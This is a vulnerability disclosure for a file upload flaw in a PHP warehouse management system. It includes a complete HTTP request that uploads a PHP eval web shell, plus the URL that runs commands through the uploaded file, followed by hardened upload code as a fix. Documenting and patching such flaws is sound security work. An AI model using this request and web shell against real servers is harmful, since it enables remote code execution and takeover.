WMS has a file upload code execution vulnerability

Build environment: Apache 2.4.39; MySQL 5.0.96; PHP 5.3.29

1. In /src/product/addproduct.php, on lines 242-246 of the code, `upfile` is the parameter used for uploading pictures.

2. Then we come to savenewproduct.php. The `upfile` value from POST is assigned to `$upfile`. Lines 45-64 of the code show that uploaded files are stored in the `upimages` directory and are named sequentially: 1.jpg, 2.jpg, and so on, adding 1 each time.

3. Therefore, we can construct a POC that performs the file upload.

POC:

```http
POST /product/savenewproduct.php?flag=1 HTTP/1.1
Host: xxxx
Content-Length: 1507
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wmsvul.test
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryONFXfH9gn2T6Gxal
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://wmsvul.test/product/addproduct.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=qo4cusl0vp4mame43ssakta695
Connection: close

------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="typeid"

0001
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="name"

123123123123
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="encode"

1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="barcode"

1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="size"

1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="unit"

None
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="upperlimit"

1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="lowerlimit"

10
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="inprice"

1025
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="outprice"

123
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="MAX_FILE_SIZE"

2000000
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="upfile"; filename="POC.php"
Content-Type: application/octet-stream

<?php @eval($_GET['ace']);?>
------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="jianjie"


------WebKitFormBoundaryONFXfH9gn2T6Gxal
Content-Disposition: form-data; name="submit"

添加
------WebKitFormBoundaryONFXfH9gn2T6Gxal--
```

Since the uploaded file is not verified, the PHP file is uploaded successfully and is stored as 1.php.

We then access the PHP file to execute the code:

```
http://wmsvul.test/product/upimages/1.php?ace=phpinfo();
```
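As an added example (not code from the WMS project), this is how the savenewproduct.php upload step described above could be hardened while keeping its upimages/ directory and 1.jpg, 2.jpg naming; `UPLOAD_DIR`, `allowed_types`, `next_sequence_number` and `save_product_image` are names assumed for this example, and `$_FILES['upfile']` is the parameter the report names.

```php
<?php
// Added example, not the WMS project's code: a hardened upload step that keeps
// the sequential naming in upimages/ but decides the file type from the bytes
// and never keeps the client-chosen filename or extension.
// UPLOAD_DIR, allowed_types, next_sequence_number, save_product_image: assumed names.
define('UPLOAD_DIR', __DIR__ . '/upimages');   // assumed storage directory
define('MAX_BYTES', 2000000);                   // the MAX_FILE_SIZE value in the POC

function allowed_types() {
    // Detected MIME type => extension the server will assign.
    return array('image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif');
}

function next_sequence_number($dir) {
    // The "1.jpg, 2.jpg, then add 1" rule: highest existing number plus one.
    $max = 0;
    foreach (glob($dir . '/*') as $path) {
        if (preg_match('/^(\d+)\.(jpg|png|gif)$/', basename($path), $m)) {
            $max = max($max, (int) $m[1]);
        }
    }
    return $max + 1;
}

function save_product_image(array $file) {
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Type comes from the content, not from filename="POC.php" or the
    // multipart Content-Type header, both of which the client controls.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    $types = allowed_types();
    if (!isset($types[$mime]) || getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not an image');
    }
    // Server-chosen name and extension; the client's filename is discarded.
    $dest = sprintf('%s/%d.%s', UPLOAD_DIR, next_sequence_number(UPLOAD_DIR), $types[$mime]);
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    return $dest;
}
```

Call `save_product_image($_FILES['upfile'])` from the handler and turn a `RuntimeException` into a 400 response. Because a valid image can still carry embedded PHP, also disable script execution for the upimages/ directory in the web server configuration (for Apache's mod_php, `php_admin_flag engine off` in that directory's config) as a second layer.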